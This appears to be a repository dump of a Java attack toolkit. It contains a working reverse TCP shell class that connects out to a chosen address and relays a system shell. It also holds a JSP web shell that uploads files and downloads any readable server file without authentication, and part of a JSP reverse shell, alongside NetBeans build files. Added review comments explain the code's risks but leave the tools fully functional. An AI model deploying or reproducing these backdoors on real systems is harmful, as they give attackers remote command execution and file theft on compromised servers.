        return detected;
    }

    /**
     * Copies what is currently readable from {@code input} to {@code output} through the shared
     * byte buffer, repeating while {@code input.available()} reports more data.
     *
     * @param input  stream to read from
     * @param output stream to write to
     * @param iname  label of the input ("SOCKET", "STDOUT" or "STDERR" at the call sites);
     *               selects the Windows discard path and the disconnect check
     * @param oname  label of the output ("STDIN" or "SOCKET" at the call sites)
     */
    // strings in Java are immutable, so we need to avoid using them to minimize the data in memory
    private void brw(InputStream input, OutputStream output, String iname, String oname) {
        int bytes = 0;
        try {
            do {
                if (this.os.equals("WINDOWS") && iname.equals("STDOUT") && this.clen > 0) {
                    // for some reason Windows OS pipes STDIN into STDOUT
                    // we do not like that
                    // we need to discard the data from the stream
                    do {
                        // read at most clen bytes (capped at the buffer size) and drop them
                        bytes = input.read(this.buffer, 0, this.clen >= this.buffer.length ? this.buffer.length : this.clen);
                        this.clen -= this.clen >= this.buffer.length ? this.buffer.length : this.clen;
                    } while (bytes > 0 && this.clen > 0);
                } else {
                    bytes = input.read(this.buffer, 0, this.buffer.length);
                    if (bytes > 0) {
                        // bytes are forwarded exactly as read: no framing, encoding or encryption
                        output.write(this.buffer, 0, bytes);
                        output.flush();
                        if (this.os.equals("WINDOWS") && oname.equals("STDIN")) {
                            // remember how much was sent to the shell so the echo can be discarded
                            this.clen += bytes;
                        }
                    } else if (iname.equals("SOCKET")) {
                        // a non-positive read on the socket is treated as the peer having closed
                        this.error = true;
                        System.out.print("SOC_ERROR: Shell connection has been terminated\n\n");
                    }
                }
            } while (input.available() > 0);
        // a read timeout only means "no data yet" and is ignored; any other I/O error ends the session
        } catch (SocketTimeoutException ex) {} catch (IOException ex) {
            this.error = true;
            System.out.print(String.format("STRM_ERROR: Cannot read from %s or write to %s, program will now exit...\n\n", iname, oname));
        }
    }

    /**
     * Connects to {@code addr}, starts the shell and relays data until the shell process ends
     * or brw() sets {@code error}. Does nothing if detect() reports an unsupported platform.
     * Every stream, the socket and the process are closed or destroyed in the finally block.
     */
    public void run() {
        if (this.detect()) {
            Socket client = null;
            OutputStream socin = null;  // socket output: data going to the remote peer
            InputStream socout = null;  // socket input: data coming from the remote peer

            Process process = null;
            OutputStream stdin = null;
            InputStream stdout = null;
            InputStream stderr = null;

            try {
                client = new Socket();
                // 100 ms read timeout, so the socket read in brw() cannot block the loop for long
                client.setSoTimeout(100);
                client.connect(this.addr);
                socin = client.getOutputStream();
                socout = client.getInputStream();

                this.buffer = new byte[1024];

                // the shell is started with no arguments and with stdin, stdout and stderr all piped to this JVM
                process = new ProcessBuilder(this.shell).redirectInput(ProcessBuilder.Redirect.PIPE).redirectOutput(ProcessBuilder.Redirect.PIPE).redirectError(ProcessBuilder.Redirect.PIPE).start();
                stdin = process.getOutputStream();
                stdout = process.getInputStream();
                stderr = process.getErrorStream();

                System.out.print("Backdoor is up and running...\n\n");
                // polling loop: socket -> shell stdin, then shell stderr/stdout -> socket
                do {
                    if (!process.isAlive()) {
                        System.out.print("PROC_ERROR: Shell process has been terminated\n\n"); break;
                    }
                    this.brw(socout, stdin, "SOCKET", "STDIN");
                    // process streams are read only when data is available
                    if (stderr.available() > 0) { this.brw(stderr, socin, "STDERR", "SOCKET"); }
                    if (stdout.available() > 0) { this.brw(stdout, socin, "STDOUT", "SOCKET"); }
                } while (!this.error);
                System.out.print("Backdoor will now exit...\n");
            } catch (IOException ex) {
                System.out.print(String.format("ERROR: %s\n", ex.getMessage()));
            } finally {
                // best-effort cleanup: failures while closing are deliberately ignored
                if (stdin != null) { try { stdin.close() ; } catch (IOException ex) {} }
                if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} }
                if (stderr != null) { try { stderr.close(); } catch (IOException ex) {} }
                if (process != null) { process.destroy(); }

                if (socin != null) { try { socin.close() ; } catch (IOException ex) {} }
                if (socout != null) { try { socout.close(); } catch (IOException ex) {} }
                if (client != null) { try { client.close(); } catch (IOException ex) {} }

                // the relay buffer is overwritten with zeros, so the last relayed bytes do not
                // remain in it (relevant when examining a heap dump of the process)
                if (this.buffer != null) { Arrays.fill(this.buffer, (byte)0); }
            }
        }
    }

    /**
     * Command-line entry point: expects exactly two arguments, the address and the port,
     * validates them (non-empty address; integer port, 0 to 65535) and runs one session.
     *
     * @param args command-line arguments; args[0] is the address, args[1] the port
     */
    public static void main(String[] args) {
        System.out.print("Java Reverse TCP v3.0 by Ivan Sincek.\n");
        System.out.print("GitHub repository at github.com/ivan-sincek/java-reverse-tcp.\n");
        if (args.length != 2) {
            // NOTE(review): the usage text names no arguments after the jar; placeholders for
            // the address and port were presumably lost when this listing was rendered
            System.out.print("Usage: java -jar Reverse_Shell.jar \n");
        } else {
            boolean error = false;
            args[0] = args[0].trim();
            if (args[0].length() < 1) {
                error = true;
                System.out.print("Address is required\n");
            }
            int port = -1;
            args[1] = args[1].trim();
            if (args[1].length() < 1) {
                error = true;
                System.out.print("Port number is required\n");
            } else {
                try {
                    port = Integer.parseInt(args[1]);
                    if (port < 0 || port > 65535) {
                        error = true;
                        System.out.print("Port number is out of range\n");
                    }
                } catch (NumberFormatException ex) {
                    error = true;
                    System.out.print("Port number is not valid\n");
                }
            }
            if (!error) {
                ReverseShell sh = new ReverseShell(args[0], port);
                sh.run();
                // drop the only reference and request a collection; the JVM may ignore the request
                sh = null;
                System.gc();
            }
        }
    }

}
169 |
--------------------------------------------------------------------------------
/src/Web Shell/build.xml:
--------------------------------------------------------------------------------
11 | Builds, tests, and runs the project Web Shell.
--------------------------------------------------------------------------------
/src/Web Shell/nbproject/ant-deploy.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/src/Web Shell/nbproject/build-impl.xml:
--------------------------------------------------------------------------------
237 | Must set src.dir
238 | Must set test.src.dir
239 | Must set build.dir
240 | Must set build.web.dir
241 | Must set build.generated.dir
242 | Must set dist.dir
243 | Must set build.classes.dir
244 | Must set dist.javadoc.dir
245 | Must set build.test.classes.dir
246 | Must set build.test.results.dir
247 | Must set build.classes.excludes
248 | Must set dist.war
258 | The Java EE server classpath is not correctly set up - server home directory is missing.
259 | Either open the project in the IDE and assign the server or setup the server classpath manually.
260 | For example like this:
261 | ant -Dj2ee.server.home=<app_server_installation_directory>
262 |
263 |
264 | The Java EE server classpath is not correctly set up. Your active server type is ${j2ee.server.type}.
265 | Either open the project in the IDE and assign the server or setup the server classpath manually.
266 | For example like this:
267 | ant -Duser.properties.file=<path_to_property_file> (where you put the property "j2ee.platform.classpath" in a .properties file)
268 | or ant -Dj2ee.platform.classpath=<server_classpath> (where no properties file is used)
365 | Must set javac.includes
492 | No tests executed.
493 |
494 |
495 |
496 |
497 |
498 |
499 |
500 |
501 |
502 |
503 |
504 |
505 |
506 |
507 |
508 |
509 |
510 |
511 |
512 |
513 |
514 |
515 |
516 |
517 |
518 |
519 |
520 |
521 |
522 |
523 |
524 |
525 |
526 |
527 |
528 |
529 |
530 |
531 |
532 |
533 |
534 |
535 |
536 |
537 |
538 |
539 |
540 |
541 |
542 |
543 |
544 |
545 |
546 |
547 |
548 |
549 |
550 |
551 |
552 |
553 |
554 |
555 |
556 |
557 |
558 |
559 |
560 |
561 |
562 |
563 |
564 |
565 |
566 |
567 |
568 |
569 |
570 |
571 |
572 |
573 |
574 |
575 |
576 |
577 |
578 |
579 |
580 |
581 |
582 |
583 |
584 |
585 |
586 |
587 |
588 |
589 |
590 |
591 |
592 |
593 |
594 |
595 |
596 |
597 |
598 |
599 |
600 |
601 |
602 |
603 |
604 |
605 |
606 |
607 |
608 |
609 |
610 |
611 |
612 |
613 |
614 |
615 |
616 |
617 |
618 |
619 |
620 |
621 |
622 |
623 |
624 |
625 |
626 |
627 |
628 |
629 |
630 |
631 |
632 |
633 |
634 |
635 |
636 |
637 |
638 |
639 |
640 |
641 |
642 |
643 |
644 |
645 |
646 |
647 |
648 |
649 |
650 |
651 |
652 |
653 |
654 |
655 |
656 |
657 |
658 |
659 |
660 |
661 |
662 |
663 |
664 |
665 |
666 |
667 |
668 |
669 |
670 |
671 |
672 |
673 |
674 |
675 |
676 |
677 |
678 |
679 |
680 |
681 |
682 |
683 |
684 |
685 |
686 |
687 |
688 |
689 |
690 |
691 |
692 |
693 |
694 |
695 |
696 |
697 |
698 |
699 |
700 |
701 |
702 |
703 |
704 |
705 |
706 |
707 |
708 |
709 |
710 |
711 |
712 |
713 |
714 |
715 |
716 |
717 |
718 |
719 |
720 |
721 |
722 |
723 |
724 |
725 |
726 |
727 |
728 |
729 |
730 |
731 |
732 |
733 |
734 |
735 |
736 |
737 |
738 |
739 |
740 |
741 |
742 |
743 |
744 |
745 |
746 |
747 |
748 |
749 |
750 |
751 |
752 |
753 |
754 |
755 |
756 |
757 |
758 |
759 |
760 |
761 |
762 |
763 |
764 |
765 |
766 |
767 |
768 |
769 |
770 |
771 |
772 |
773 |
774 |
775 |
776 |
777 |
778 |
779 |
780 |
781 |
782 |
783 | The libs.CopyLibs.classpath property is not set up.
784 | This property must point to
785 | org-netbeans-modules-java-j2seproject-copylibstask.jar file which is part
786 | of NetBeans IDE installation and is usually located at
787 | <netbeans_installation>/java<version>/ant/extra folder.
788 | Either open the project in the IDE and make sure CopyLibs library
789 | exists or setup the property manually. For example like this:
790 | ant -Dlibs.CopyLibs.classpath=a/path/to/org-netbeans-modules-java-j2seproject-copylibstask.jar
791 |
792 |
793 |
794 |
795 |
796 |
797 |
798 |
799 |
800 |
801 |
802 |
803 |
804 |
805 |
806 |
807 |
808 |
809 |
810 |
811 |
812 |
813 |
814 |
815 |
816 |
817 |
820 |
821 |
822 |
823 |
824 |
825 |
826 |
827 |
828 |
829 |
830 | Must set JVM to use for profiling in profiler.info.jvm
831 | Must set profiler agent JVM arguments in profiler.info.jvmargs.agent
832 |
833 |
836 |
837 |
840 |
841 |
842 |
843 |
844 |
845 |
846 |
847 |
848 |
849 |
850 |
851 |
852 |
853 |
854 |
855 |
856 |
857 |
858 |
859 |
860 |
861 |
862 |
863 |
864 |
865 |
866 |
867 |
868 |
869 |
870 |
871 |
872 |
873 |
874 |
875 |
876 |
877 |
878 |
879 |
880 |
881 |
882 |
883 |
884 |
885 |
886 | Must select some files in the IDE or set javac.includes
887 |
888 |
889 |
890 |
891 |
892 |
893 |
894 |
895 |
896 |
897 |
898 |
899 |
900 |
901 |
902 |
903 |
904 |
905 |
906 |
907 |
908 |
909 |
910 |
911 |
912 |
913 |
914 |
915 |
916 |
917 |
918 |
919 | Must select some files in the IDE or set javac.jsp.includes
920 |
921 |
922 |
923 |
924 |
925 |
926 |
927 |
928 |
929 |
930 |
931 |
932 |
933 |
934 |
935 |
936 |
937 |
938 |
939 |
940 |
941 |
942 |
943 |
944 |
945 | Must select a file in the IDE or set jsp.includes
946 |
947 |
948 |
951 |
952 |
953 |
954 |
955 |
956 |
957 |
958 |
959 |
960 |
961 |
962 |
963 |
964 |
965 |
966 |
967 |
968 |
969 |
970 |
971 |
972 |
973 |
974 |
975 |
976 |
977 |
978 |
979 |
980 |
981 |
982 |
983 |
984 |
985 |
986 |
987 |
988 |
989 |
990 |
991 |
992 |
993 |
994 |
995 |
996 |
997 |
998 |
999 |
1000 |
1001 |
1002 |
1003 |
1004 |
1005 |
1008 |
1009 |
1010 |
1011 |
1012 |
1013 |
1014 |
1015 |
1016 |
1017 |
1018 |
1019 |
1020 |
1021 |
1022 |
1023 |
1024 |
1025 |
1026 |
1027 |
1028 |
1029 |
1030 |
1031 |
1032 |
1033 |
1034 |
1035 |
1036 |
1037 |
1038 |
1039 |
1040 |
1041 |
1042 |
1043 |
1044 |
1045 |
1046 |
1047 |
1048 |
1049 |
1050 |
1051 |
1052 |
1053 |
1054 |
1055 |
1056 |
1057 |
1058 |
1059 |
1060 |
1061 |
1062 |
1063 |
1064 |
1065 |
1066 |
1067 |
1068 |
1069 |
1070 |
1071 |
1072 |
1073 |
1074 |
1075 |
1076 |
1077 |
1078 |
1079 |
1080 |
1081 |
1082 |
1083 |
1084 |
1085 |
1086 |
1087 |
1088 |
1089 |
1090 |
1091 |
1092 |
1093 |
1094 |
1095 |
1096 |
1097 |
1098 |
1099 |
1100 |
1101 |
1102 |
1103 |
1104 |
1105 |
1106 |
1107 |
1108 |
1109 |
1110 |
1111 |
1112 | Browser not found, cannot launch the deployed application. Try to set the BROWSER environment variable.
1113 |
1114 |
1115 | Launching ${browse.url}
1116 |
1117 |
1118 |
1119 |
1120 |
1121 | Must select one file in the IDE or set run.class
1122 |
1123 |
1124 |
1125 | Must select one file in the IDE or set run.class
1126 |
1127 |
1128 |
1129 |
1130 |
1131 |
1134 |
1135 |
1136 |
1137 |
1138 |
1139 |
1140 |
1141 |
1142 |
1143 |
1144 |
1145 |
1146 |
1147 |
1148 |
1149 |
1150 |
1151 |
1152 |
1153 |
1154 |
1155 |
1156 |
1157 |
1158 |
1159 |
1160 |
1161 |
1162 |
1163 |
1164 |
1165 | Must select one file in the IDE or set debug.class
1166 |
1167 |
1168 |
1169 |
1170 |
1171 |
1172 |
1173 |
1174 |
1175 |
1176 |
1177 | Must select one file in the IDE or set debug.class
1178 |
1179 |
1180 |
1181 |
1182 | Must set fix.includes
1183 |
1184 |
1185 |
1186 |
1187 |
1188 |
1189 |
1194 |
1197 |
1198 |
1199 |
1200 |
1201 |
1202 |
1203 |
1204 |
1205 |
1206 |
1207 |
1208 |
1209 |
1210 |
1211 |
1212 |
1213 |
1214 |
1215 |
1216 |
1217 |
1218 |
1219 | This target only works when run from inside the NetBeans IDE.
1220 |
1221 |
1222 |
1223 |
1224 |
1225 |
1226 |
1227 |
1228 |
1229 |
1230 |
1231 |
1232 |
1233 |
1234 |
1235 |
1236 |
1237 |
1238 |
1239 |
1240 |
1241 |
1242 |
1243 |
1244 |
1245 |
1246 |
1247 |
1248 |
1249 |
1250 |
1251 |
1252 |
1253 |
1254 |
1255 |
1256 |
1257 |
1258 |
1259 |
1260 |
1261 |
1262 |
1263 |
1264 |
1265 |
1266 |
1267 |
1268 |
1269 |
1270 |
1273 |
1274 |
1275 |
1276 |
1277 |
1278 |
1279 |
1280 |
1281 |
1282 |
1283 |
1284 |
1285 |
1286 |
1287 |
1288 |
1289 |
1290 |
1291 |
1292 |
1293 |
1294 |
1295 |
1296 |
1297 |
1298 |
1299 |
1303 |
1304 |
1305 |
1306 |
1307 |
1308 |
1309 |
1310 |
1311 |
1312 |
1313 |
1314 |
1315 |
1316 |
1317 |
1318 |
1319 |
1320 |
1321 |
1322 |
1323 |
1324 |
1325 |
1326 |
1327 | Must select some files in the IDE or set javac.includes
1328 |
1329 |
1330 |
1331 |
1332 |
1333 |
1334 |
1335 |
1336 |
1337 |
1338 |
1342 |
1343 |
1344 |
1345 |
1346 |
1347 |
1348 |
1349 | Some tests failed; see details above.
1350 |
1351 |
1352 |
1353 |
1354 |
1355 |
1356 |
1357 |
1358 | Must select some files in the IDE or set test.includes
1359 |
1360 |
1361 |
1362 | Some tests failed; see details above.
1363 |
1364 |
1365 |
1366 | Must select some files in the IDE or set test.class
1367 | Must select some method in the IDE or set test.method
1368 |
1369 |
1370 |
1371 | Some tests failed; see details above.
1372 |
1373 |
1374 |
1378 |
1379 | Must select one file in the IDE or set test.class
1380 |
1381 |
1382 |
1383 | Must select one file in the IDE or set test.class
1384 | Must select some method in the IDE or set test.method
1385 |
1386 |
1387 |
1388 |
1389 |
1390 |
1391 |
1392 |
1393 |
1394 |
1395 |
1396 |
1397 |
1401 |
1402 |
1403 |
1404 |
1405 |
1406 |
1407 |
1408 |
1409 |
1410 |
1411 |
1412 |
1413 |
1414 |
1415 |
1416 |
1417 |
1418 |
1419 |
1420 |
1421 |
1422 |
1423 |
1424 |
1425 |
1426 |
1427 |
1428 |
--------------------------------------------------------------------------------
/src/Web Shell/nbproject/genfiles.properties:
--------------------------------------------------------------------------------
1 | build.xml.data.CRC32=26c2afd3
2 | build.xml.script.CRC32=81e3cf17
3 | build.xml.stylesheet.CRC32=1707db4f@1.84.0.1
4 | # This file is used by a NetBeans-based IDE to track changes in generated files such as build-impl.xml.
5 | # Do not edit this file. You may delete it but then the IDE will never regenerate such files for you.
6 | nbproject/build-impl.xml.data.CRC32=26c2afd3
7 | nbproject/build-impl.xml.script.CRC32=5ee030bd
8 | nbproject/build-impl.xml.stylesheet.CRC32=334708a0@1.84.0.1
9 |
--------------------------------------------------------------------------------
/src/Web Shell/nbproject/project.properties:
--------------------------------------------------------------------------------
1 | annotation.processing.enabled=true
2 | annotation.processing.enabled.in.editor=true
3 | annotation.processing.processors.list=
4 | annotation.processing.run.all.processors=true
5 | annotation.processing.source.output=${build.generated.sources.dir}/ap-source-output
6 | build.classes.dir=${build.web.dir}/WEB-INF/classes
7 | build.classes.excludes=**/*.java,**/*.form
8 | build.dir=build
9 | build.generated.dir=${build.dir}/generated
10 | build.generated.sources.dir=${build.dir}/generated-sources
11 | build.test.classes.dir=${build.dir}/test/classes
12 | build.test.results.dir=${build.dir}/test/results
13 | build.web.dir=${build.dir}/web
14 | build.web.excludes=${build.classes.excludes}
15 | client.urlPart=
16 | compile.jsps=false
17 | conf.dir=${source.root}/conf
18 | debug.classpath=${build.classes.dir}:${javac.classpath}
19 | debug.test.classpath=\
20 | ${run.test.classpath}
21 | display.browser=true
22 | # Files to be excluded from distribution war
23 | dist.archive.excludes=
24 | dist.dir=dist
25 | dist.ear.war=${dist.dir}/${war.ear.name}
26 | dist.javadoc.dir=${dist.dir}/javadoc
27 | dist.war=${dist.dir}/${war.name}
28 | excludes=
29 | includes=**
30 | j2ee.compile.on.save=true
31 | j2ee.copy.static.files.on.save=true
32 | j2ee.deploy.on.save=true
33 | j2ee.platform=1.5
34 | j2ee.platform.classpath=${j2ee.server.domain}/bin/tomcat-juli.jar:${j2ee.server.domain}/lib/annotations-api.jar:${j2ee.server.domain}/lib/catalina-ant.jar:${j2ee.server.domain}/lib/catalina-ha.jar:${j2ee.server.domain}/lib/catalina-tribes.jar:${j2ee.server.domain}/lib/catalina.jar:${j2ee.server.domain}/lib/ecj-4.4.2.jar:${j2ee.server.domain}/lib/el-api.jar:${j2ee.server.domain}/lib/jasper-el.jar:${j2ee.server.domain}/lib/jasper.jar:${j2ee.server.domain}/lib/jsp-api.jar:${j2ee.server.domain}/lib/servlet-api.jar:${j2ee.server.domain}/lib/tomcat-api.jar:${j2ee.server.domain}/lib/tomcat-coyote.jar:${j2ee.server.domain}/lib/tomcat-dbcp.jar:${j2ee.server.domain}/lib/tomcat-i18n-de.jar:${j2ee.server.domain}/lib/tomcat-i18n-es.jar:${j2ee.server.domain}/lib/tomcat-i18n-fr.jar:${j2ee.server.domain}/lib/tomcat-i18n-ja.jar:${j2ee.server.domain}/lib/tomcat-i18n-ko.jar:${j2ee.server.domain}/lib/tomcat-i18n-ru.jar:${j2ee.server.domain}/lib/tomcat-i18n-zh-CN.jar:${j2ee.server.domain}/lib/tomcat-jdbc.jar:${j2ee.server.domain}/lib/tomcat-util.jar:${j2ee.server.domain}/lib/tomcat7-websocket.jar:${j2ee.server.domain}/lib/websocket-api.jar
35 | j2ee.server.type=Tomcat
36 | jar.compress=false
37 | javac.classpath=
38 | # Space-separated list of extra javac options
39 | javac.compilerargs=
40 | javac.debug=true
41 | javac.deprecation=false
42 | javac.processorpath=\
43 | ${javac.classpath}
44 | javac.source=1.8
45 | javac.target=1.8
46 | javac.test.classpath=\
47 | ${javac.classpath}:\
48 | ${build.classes.dir}
49 | javac.test.processorpath=\
50 | ${javac.test.classpath}
51 | javadoc.additionalparam=
52 | javadoc.author=false
53 | javadoc.encoding=${source.encoding}
54 | javadoc.noindex=false
55 | javadoc.nonavbar=false
56 | javadoc.notree=false
57 | javadoc.preview=true
58 | javadoc.private=false
59 | javadoc.splitindex=true
60 | javadoc.use=true
61 | javadoc.version=false
62 | javadoc.windowtitle=
63 | lib.dir=${web.docbase.dir}/WEB-INF/lib
64 | no.dependencies=false
65 | persistence.xml.dir=${conf.dir}
66 | platform.active=default_platform
67 | resource.dir=setup
68 | run.test.classpath=\
69 | ${javac.test.classpath}:\
70 | ${build.test.classes.dir}
71 | # Space-separated list of JVM arguments used when running a class with a main method or a unit test
72 | # (you may also define separate properties like run-sys-prop.name=value instead of -Dname=value):
73 | runmain.jvmargs=
74 | source.encoding=UTF-8
75 | source.root=src
76 | src.dir=${source.root}/java
77 | test.src.dir=test
78 | war.content.additional=
79 | war.ear.name=${war.name}
80 | war.name=Web_Shell.war
81 | web.docbase.dir=web
82 | webinf.dir=web/WEB-INF
83 |
--------------------------------------------------------------------------------
/src/Web Shell/nbproject/project.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | org.netbeans.modules.web.project
4 |
5 |
6 | Web Shell
7 | 1.6.5
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/src/Web Shell/src/conf/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 |
3 |
--------------------------------------------------------------------------------
/src/Web Shell/web/META-INF/context.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/src/Web Shell/web/WEB-INF/web.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | 30
6 |
7 |
8 |
9 | index.jsp
10 |
11 |
12 |
--------------------------------------------------------------------------------
/src/Web Shell/web/files.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.nio.file.Files"%>
2 | <%@page import="java.nio.file.Paths"%>
3 | <%@page import="java.io.File"%>
4 | <%@page import="org.apache.tomcat.util.http.fileupload.FileItem"%>
5 | <%@page import="org.apache.tomcat.util.http.fileupload.servlet.ServletRequestContext"%>
6 | <%@page import="org.apache.tomcat.util.http.fileupload.servlet.ServletFileUpload"%>
7 | <%@page import="org.apache.tomcat.util.http.fileupload.disk.DiskFileItemFactory"%>
8 |
9 | <%@page import="java.util.Iterator"%>
10 | <%-- Copyright (c) 2021 Ivan Šincek --%>
11 | <%-- v3.0 --%>
12 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
13 |
14 | <%-- modify the script name and request parameter name to random ones to prevent others from accessing and using your web shell --%>
15 | <%-- don't forget to change the script name in the action attribute --%>
16 | <%-- when downloading a file, you should URL encode the file path --%>
17 |
18 | <%
// Review note (defensive reading): this scriptlet is a file upload/download handler with no
// authentication or authorisation check anywhere in the page. Anyone who can reach the JSP and
// knows the parameter name gets both branches below.
//   - Upload: a multipart POST part whose field name equals `parameter` is written into the
//     JVM's working directory (user.dir).
//   - Download: a GET parameter of the same name is treated as a filesystem path and the file's
//     bytes are returned as an attachment.
// Both run with the privileges of the servlet container's process.
19 | // your parameter/key here
20 | String parameter = "file";
21 | String output = "";
22 | if (request.getMethod() == "POST" && request.getContentType() != null && request.getContentType().startsWith("multipart/form-data")) {
23 | Iterator files = new ServletFileUpload(new DiskFileItemFactory()).parseRequest(new ServletRequestContext(request)).iterator();
24 | while (files.hasNext()) {
25 | FileItem file = (FileItem)files.next();
26 | if (file.getFieldName().equals(parameter)) {
27 | try {
// The stored name comes from the client-supplied part name; only the text after the last
// platform separator is kept. There is no extension, type or size check before the write.
28 | output = file.getName();
29 | int pos = output.lastIndexOf(File.separator);
30 | if (pos >= 0) {
31 | output = output.substring(pos + 1);
32 | }
33 | output = System.getProperty("user.dir") + File.separator + output;
34 | file.write(new File(output));
// The success message discloses the absolute server-side path of the written file.
35 | output = String.format("SUCCESS: File was uploaded to '%s'\n", output);
36 | } catch (Exception ex) {
37 | output = String.format("ERROR: %s\n", ex.getMessage());
38 | }
39 | }
40 | file = null;
41 | }
42 | files = null;
43 | }
44 | if (request.getMethod() == "GET" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) {
45 | try {
// The request value is passed to Paths.get() unchanged: no base directory, no normalisation,
// no allow-list. Any file readable by the container's account can be returned.
46 | output = request.getParameter(parameter).trim();
47 | response.setHeader("Content-Type", "application/octet-stream");
48 | response.setHeader("Content-Disposition", String.format("attachment; filename=\"%s\"", Paths.get(output).getFileName()));
// readAllBytes() loads the whole file into memory before it is written to the response.
49 | response.getOutputStream().write(Files.readAllBytes(Paths.get(output)));
50 | response.getOutputStream().flush();
51 | response.getOutputStream().close();
52 | } catch (Exception ex) {
// `output` still holds text derived from the request here and is printed further down the
// page without HTML escaping.
53 | output = String.format("ERROR: %s\n", ex.getMessage());
54 | }
55 | }
56 | // if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
57 | // out.print("" + output + "
"); output = null; System.gc();
58 | %>
59 |
60 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
61 |
62 |
63 |
64 |
65 | JSP File Upload/Download
66 |
67 |
68 |
69 |
70 |
74 | <% out.print(output); output = null; System.gc(); %>
75 |
76 |
77 |
--------------------------------------------------------------------------------
/src/Web Shell/web/index.jsp:
--------------------------------------------------------------------------------
1 | <%-- Copyright (c) 2021 Ivan Šincek --%>
2 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
3 | <%-- Works on Linux OS, macOS and Windows OS. --%>
4 |
5 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
6 |
7 |
8 |
9 |
10 | Simple Java Web Shells
11 |
12 |
13 |
54 |
55 |
56 |
64 |
65 |
66 |
--------------------------------------------------------------------------------
/src/Web Shell/web/jsp_reverse_shell.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.net.SocketTimeoutException"%>
2 | <%@page import="java.util.Arrays"%>
3 | <%@page import="java.net.Socket"%>
4 | <%@page import="java.io.IOException"%>
5 | <%@page import="java.io.OutputStream"%>
6 | <%@page import="java.io.InputStream"%>
7 | <%@page import="java.net.InetSocketAddress"%>
8 |
9 | <%-- Copyright (c) 2021 Ivan Šincek --%>
10 | <%-- v3.0 --%>
11 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
12 | <%-- Works on Linux OS, macOS, and Windows OS. --%>
13 |
14 | <%!
// Review note (defensive reading): ReverseShell opens an outbound TCP connection to the address
// given to the constructor, starts the platform command interpreter as a child of the servlet
// container's JVM, and relays bytes between the socket and the child's stdin/stdout/stderr
// until the process exits or a stream fails.
// Artifacts visible to monitoring: a /bin/sh or cmd.exe child process whose parent is the
// application server's JVM, and an outbound connection from that JVM. The traffic is relayed
// as raw bytes; the class adds no encryption or authentication of its own.
15 | public class ReverseShell {
16 |
// Remote endpoint the socket connects to (set once in the constructor).
17 | private InetSocketAddress addr = null;
// Normalised OS label set by detect(): "LINUX" (also used for macOS) or "WINDOWS".
18 | private String os = null;
// Interpreter chosen by detect(): "/bin/sh" or "cmd.exe".
19 | private String shell = null;
// Relay buffer shared by every brw() call; allocated in run() and zeroed in its finally block.
20 | private byte[] buffer = null;
// Windows only: number of bytes written to the child's STDIN that brw() must later discard
// from STDOUT (see the comment inside brw()).
21 | private int clen = 0;
// Set by brw() to stop the relay loop in run().
22 | private boolean error = false;
// Last status or error text; read by the page through getMessage().
23 | private String message = null;
24 |
25 | public ReverseShell(String addr, int port) {
26 | this.addr = new InetSocketAddress(addr, port);
27 | }
28 |
// Chooses the interpreter from the os.name system property. Returns false, with `message`
// set, when the name contains none of "LINUX", "MAC" or "WIN".
29 | private boolean detect() {
30 | boolean detected = true;
31 | this.os = System.getProperty("os.name").toUpperCase();
32 | if (this.os.contains("LINUX") || this.os.contains("MAC")) {
33 | this.os = "LINUX";
34 | this.shell = "/bin/sh";
35 | } else if (this.os.contains("WIN")) {
36 | this.os = "WINDOWS";
37 | this.shell = "cmd.exe";
38 | } else {
39 | detected = false;
40 | this.message = "SYS_ERROR: Underlying operating system is not supported, program will now exit...\n";
41 | }
42 | return detected;
43 | }
44 |
45 | private String getMessage() {
46 | return this.message;
47 | }
48 |
// One relay pass ("buffered read/write"): reads from `input` into the shared buffer and writes
// what was read to `output`, repeating while input.available() > 0. `iname` and `oname` are
// labels ("SOCKET", "STDIN", "STDOUT", "STDERR") used for the Windows special case and for
// error text.
49 | // strings in Java are immutable, so we need to avoid using them to minimize the data in memory
50 | private void brw(InputStream input, OutputStream output, String iname, String oname) {
51 | int bytes = 0;
52 | try {
53 | do {
54 | if (this.os.equals("WINDOWS") && iname.equals("STDOUT") && this.clen > 0) {
55 | // for some reason Windows OS pipes STDIN into STDOUT
56 | // we do not like that
57 | // we need to discard the data from the stream
58 | do {
59 | bytes = input.read(this.buffer, 0, this.clen >= this.buffer.length ? this.buffer.length : this.clen);
60 | this.clen -= this.clen >= this.buffer.length ? this.buffer.length : this.clen;
61 | } while (bytes > 0 && this.clen > 0);
62 | } else {
63 | bytes = input.read(this.buffer, 0, this.buffer.length);
64 | if (bytes > 0) {
65 | output.write(this.buffer, 0, bytes);
66 | output.flush();
67 | if (this.os.equals("WINDOWS") && oname.equals("STDIN")) {
68 | this.clen += bytes;
69 | }
70 | } else if (iname.equals("SOCKET")) {
// A read from the socket that returns no bytes is treated as the peer having closed.
71 | this.error = true;
72 | this.message = "SOC_ERROR: Shell connection has been terminated\n";
73 | }
74 | }
75 | } while (input.available() > 0);
// The empty SocketTimeoutException handler is deliberate: run() sets a 100 ms read timeout,
// so an idle socket read returns here and run() goes on to poll stderr and stdout.
76 | } catch (SocketTimeoutException ex) {} catch (IOException ex) {
77 | this.error = true;
78 | this.message = String.format("STRM_ERROR: Cannot read from %s or write to %s, program will now exit...\n", iname, oname);
79 | }
80 | }
81 |
// Connects, spawns the interpreter with all three standard streams piped, then loops:
// socket -> stdin, stderr -> socket, stdout -> socket, until the process dies or brw() sets
// `error`. The loop runs on the calling thread, so the caller blocks for the whole session.
82 | public void run() {
83 | if (this.detect()) {
84 | Socket client = null;
85 | OutputStream socin = null;
86 | InputStream socout = null;
87 |
88 | Process process = null;
